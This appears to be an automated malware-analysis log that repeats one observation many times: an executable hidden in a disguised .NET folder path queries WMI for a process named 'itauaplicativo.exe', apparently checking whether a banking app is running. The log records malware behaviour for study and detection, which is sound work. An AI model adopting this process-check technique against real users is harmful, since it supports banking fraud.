Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
